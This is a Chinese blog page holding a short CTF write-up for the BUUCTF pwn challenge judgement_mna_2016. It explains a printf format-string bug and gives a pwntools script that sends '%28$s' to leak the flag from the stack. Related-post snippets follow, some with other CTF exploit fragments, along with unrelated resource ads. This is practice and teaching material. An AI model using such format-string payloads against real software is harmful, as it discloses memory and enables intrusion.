BUUCTF之“judgement_mna_2016”

最新推荐文章于 2022-11-01 09:16:50 发布

原创最新推荐文章于 2022-11-01 09:16:50 发布 · 215 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#pwn

二进制pwn学习专栏收录该内容

28 篇文章

订阅专栏

本文介绍了一个简单的格式化字符串漏洞实例，通过分析发现flag并利用printf函数泄露内存的方法。关键在于计算不同Ubuntu版本下gdb调试时的偏移量差异。

这题本身比较简单，但是增强了一丝丝漏洞意识

在这里插入图片描述
看到flag在文中又看到printf显然想到格式化字符串漏洞泄露内存，，，
关键是计算偏移：这里我再次分别利用ubuntu21 和ubuntu 16都gdb调试了一下，发现ubuntu21的调试偏移计算结果不一样，，，，，离谱之。

from pwn import*
p=remote('node4.buuoj.cn',28336)
payload="%28$s"
p.sendlineafter("flag >>",payload)
p.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Hvf0x

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

[BUUCTF]PWN——judgement_mna_2016（32位fmt）

mcmuyanga的博客

03-18

589

judgement_mna_2016 例行检查，32位程序，开启了canary和nx 运行一下，看看大概的情况 32位ida载入明显的格式化字符串漏洞，动调看一下输入点的位置，找一下flag在栈上的位置，算一下偏移就能够打印出flag 先找一下输入点参数在栈上的位置可以看到在oxffffcf4c,然后看一下栈上的布局发现在距离我们输入的数据的偏移为28和32处存放着flag，定位偏移到该处即可这题根本不用写exp，但为了水长度，贴一下吧 from pwn import * conte

[BUUCTF-pwn]——judgement_mna_2016

Y_peak的博客

03-31

307

[BUUCTF-pwn]——judgement_mna_2016 还行的一道题, 不过动态调试的时候, 需要你手写一个flag.txt文件, 不然没办法动态调试. 一看就知道这个地方储存的flag, 如果不确定. 可以去看下start函数的汇编, 执行main函数前就已经将flag写入了下面我们只需要计算偏移输出就好, 记得自己在目录下面写个flag.txt文件, 不然没办法调试的. 偏移0x1c 或者 0x20都可以 exploit from pwn import * #p = process('.

参与评论您还未登录，请先登录后发表或查看评论

diary_mna_2016

seaaseesa的博客

07-24

466

diary_mna_2016 首先，检查一下程序的保护机制然后检查一下沙箱机制，发现禁用了execve还有open函数，但是没有堆sys_number的范围进行判断，因此，可以利用retf切换到32位模式绕过沙箱。然后，我们用IDA分析一下，输入函数存在off by one。程序自己用链表实现了一个堆块管理器。其free功能使用的是unlink，将堆块取出、合并等操作，但是缺少链表完整性检查这里，我们unlink不能直接将got表修改为system_add.

judgement_mna_2016

z1r0的博客

02-16

348

judgement_mna_2016 查看保护这里有一个格式化字符串，flag也被放到栈上去了。这题目很简单，flag在栈上，动调一下看一下flag的偏移然后借助格式化打印出来就行了 28的偏移 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27337)

Judgement_labview结果判定汇总vi_

09-29

在给定的标题"Judgement_labview结果判定汇总vi_"中，我们可以理解这是一份关于LabVIEW的结果判断功能的综合VI（Virtual Instrument）。这个VI主要是为了实现对多个数据通道或实验结果的判断，并通过视觉元素，如...

buuctf ciscn_2019_final_5 calloc整理机制修改tcache的fd puts \0泄漏 signal信号

carol2358的博客

08-14

653

ciscn_2019_final_5 有趣的题目涉及位级操作漏洞的关键是index为16时，二进制为1 0000 edit 他们都是认heap_ptr里最后一个16进制来判断他是index几的，index1最后一位就是1,2就是2,8就是8,4就是4，但问题是他存储是按照你申请的顺序存的，和这个index没啥关系，漏洞就来了这题很明显是要你改got表没有show，就把free改成puts来泄漏 exp： from pwn import * from LibcSearcher import ...

select DATE_FORMAT(a.year, '%Y'),COALESCE (cnt,0) from fgz_plyj.year_dict a left join (select DATE_FORMAT(b.judgement_date, '%Y') as judgement_date,count(DATE_FORMAT(b.judgement_date, '%Y')) as cnt from fgz_plyj.case_fix_attrs b inner join fgz_plyj.attr_judges c on b.case_id=c.case_id inner join fgz_plyj.court_url d on b.case_id=d.case_id where b.trial_round ='二审' and b.case_type='改判' and d.is_dup='N'and DATE_FORMAT(d.create_time, '%Y')=DATE_FORMAT(NOW(), '%Y') group by b.judgement_date) e on DATE_FORMAT(a.year, '%Y')=e.judgement_date where DATE_FORMAT(a.year, '%Y')<DATE_FORMAT(NOW(), '%Y')+1 and min(judgement_date)>DATE_FORMAT(a.year, '%Y') order by DATE_FORMAT(a.year, '%Y') desc ;分析一下这个sql

07-08

3. 子查询中，首先从`case_fix_attrs`表中选择了`judgement_date`的年份，并将其格式化为年份形式(`DATE_FORMAT(b.judgement_date, '%Y')`)。然后使用`COUNT()`函数对每个年份进行计数，并将计数结果命名为`cnt`。 ...

judgement_mna_2016（32位fmt）

m0_51251108的博客

11-05

211

judgement_mna_2016： 32位逆向分析： main函数： alloca是一个内存分配函数，与malloc,calloc,realloc类似。 _alloca是在栈(stack)上申请空间,用完马上就释放. 输入函数，getline细看：控制字符，可打印字符 init函数： load_flag函数：解题：没思路了，看其他师傅麻了，原来有个格式化字符串漏洞, 上面大都废话 112/4=32 参考师傅：https://blog.youkuaiyun.com/mcmuyanga/art

BUUCTF pwn2_sctf2016

红叶的博客

11-01

640

本题难点：绕过字符串大小限制以及是否掌握了ret2libc。

BUUCTF-PWN刷题记录-10

weixin_44145820的博客

04-19

1002

目录wustctf2020_number_game（neg操作原理）zctf2016_note2（强制转换溢出，unlink）wustctf2020_name_your_cat wustctf2020_number_game（neg操作原理）需要输入一个数，变为负数之后还是负数这题就设计计组知识了，neg的操作为按位取反+1，而0x80000000取反加一之后仍然是0x80000000，所以...

BUUCTF 周练 Week1

weixin_44229639的博客

11-03

2888

Week 1 Q1 axb_2019_brop64(这题本来是盲打，buuoj给了源文件难度减少了很多) IDA分析发现，read函数长度存在栈溢出 checksec结果，没有Canary和PIE，可直接利用栈溢出构造rop 本题靶机使用的是Ubuntu16 使用libc-2.23.so （或者可使用LibcSearcher 寻找对应libc) 构造rop思路：在此之前 puts函数已被调用，其GOT表被覆盖为真实的函数地址，可利用ROPgadget 得到real_puts_

117页-图解重要数据处理安全要求(1).pdf

11-26

117页-图解重要数据处理安全要求(1)

基于C++与ROS的双机械臂协同控制系统：Gazebo仿真与UR10实体机器人集成开发实践

最新发布

11-26

本项目采用C++编程语言结合ROS框架构建了完整的双机械臂控制系统，实现了Gazebo仿真环境下的协同运动模拟，并完成了两台实体UR10工业机器人的联动控制。该毕业设计在答辩环节获得98分的优异成绩，所有程序代码均通过系统性调试验证，保证可直接部署运行。系统架构包含三个核心模块：基于ROS通信架构的双臂协调控制器、Gazebo物理引擎下的动力学仿真环境、以及真实UR10机器人的硬件接口层。在仿真验证阶段，开发了双臂碰撞检测算法和轨迹规划模块，通过ROS控制包实现了末端执行器的同步轨迹跟踪。硬件集成方面，建立了基于TCP/IP协议的实时通信链路，解决了双机数据同步和运动指令分发等关键技术问题。本资源适用于自动化、机械电子、人工智能等专业方向的课程实践，可作为高年级课程设计、毕业课题的重要参考案例。系统采用模块化设计理念，控制核心与硬件接口分离架构便于功能扩展，具备工程实践能力的学习者可在现有框架基础上进行二次开发，例如集成视觉感知模块或优化运动规划算法。项目文档详细记录了环境配置流程、参数调试方法和实验验证数据，特别说明了双机协同作业时的时序同步解决方案。所有功能模块均提供完整的API接口说明，便于使用者快速理解系统架构并进行定制化修改。资源来源于网络分享，仅用于学习交流使用，请勿用于商业，如有侵权请联系我删除！

掌握系统变化的艺术

11-26

本书聚焦于现代软件系统中变化的常态性，提出以模型驱动和知识管理为核心的应对框架。通过元建模、可变性设计与协同追踪技术，支持系统全生命周期的持续演化。内容涵盖从需求到运维的多层级变革管理，强调跨领域协作与形式化方法的融合，为构建高适应性系统提供理论与实践指南。

基于混合规划求解机组组合（yalmip+Cplex实现）

11-26

基于混合规划求解机组组合（yalmip+Cplex实现）

Comfyui文本转语音工作流以及素材和插件资源

11-26

Comfyui文本转语音工作流以及素材和插件资源适用人群：自媒体创作者、视频剪辑师、内容运营者（需高效生成配音素材）；开发工程师、产品经理；教育 / 办公场景从业者；对 AI 音视频创作感兴趣的用户。使用场景及目标核心场景：短视频平台运营；其他说明提供可直接套用的工作流文件，无需复杂编程基础；

BYD BF7612CM系列MCU资源包（整理版）

11-26

本资源包是为使用BYD BF7612CM系列MCU的开发者整理的资料集合。由于初次接触该系列MCU时遇到了不少问题，因此将搜集到的优质资源进行了整理和上传，希望能为大家提供帮助，减少开发过程中的困扰。资源内容本资源包主要包含以下内容：官方固件库：提供BYD官方发布的BF7612CM系列MCU的固件库，方便开发者进行底层驱动开发。 Keil编译与仿真工具：包含在Keil开发环境中编译和仿真BF7612CM系列MCU所需的芯片包和JTAG驱动，确保开发环境的顺利搭建。官方MCU产品应用注意事项：提供BYD官方发布的MCU产品应用注意事项，帮助开发者避免常见问题，提高开发效率。第三方例程：搜集了一些第三方开发者分享的BF7612CM系列MCU的例程，涵盖了多种应用场景，供开发者参考和学习。触摸按键应用标准：提供BYD官方发布的触摸按键应用标准，帮助开发者快速上手触摸按键的开发。

微电网创新点基于非支配排序的蜣螂优化算法NSDBO求解微电网多目标优化调度研究(Matlab代码实现)

11-26

【微电网】【创新点】基于非支配排序的蜣螂优化算法NSDBO求解微电网多目标优化调度研究(Matlab代码实现)内容概要：本文围绕基于非支配排序的蜣螂优化算法（NSDBO）在微电网多目标优化调度中的应用展开研究，提出了一种改进的智能优化算法以解决微电网系统中经济性、环保性和能源效率等多重目标之间的权衡问题。通过引入非支配排序机制，NSDBO能够有效处理多目标优化中的帕累托前沿搜索，提升解的多样性和收敛性，并结合Matlab代码实现仿真验证，展示了该算法在微电网调度中的优越性能和实际可行性。研究涵盖了微电网典型结构建模、目标函数构建及约束条件处理，实现了对风、光、储能及传统机组的协同优化调度。; 适合人群：具备一定电力系统基础知识和Matlab编程能力的研究生、科研人员及从事微电网、智能优化算法应用的工程技术人员；熟悉优化算法与能源系统调度的高年级本科生亦可参考。; 使用场景及目标：①应用于微电网多目标优化调度问题的研究与仿真，如成本最小化、碳排放最低与供电可靠性最高之间的平衡；②为新型智能优化算法（如蜣螂优化算法及其改进版本）的设计与验证提供实践案例，推动其在能源系统中的推广应用；③服务于学术论文复现、课题研究或毕业设计中的算法对比与性能测试。; 阅读建议：建议读者结合文中提供的Matlab代码进行实践操作，重点关注NSDBO算法的核心实现步骤与微电网模型的构建逻辑，同时可对比其他多目标算法（如NSGA-II、MOPSO）以深入理解其优势与局限，进一步开展算法改进或应用场景拓展。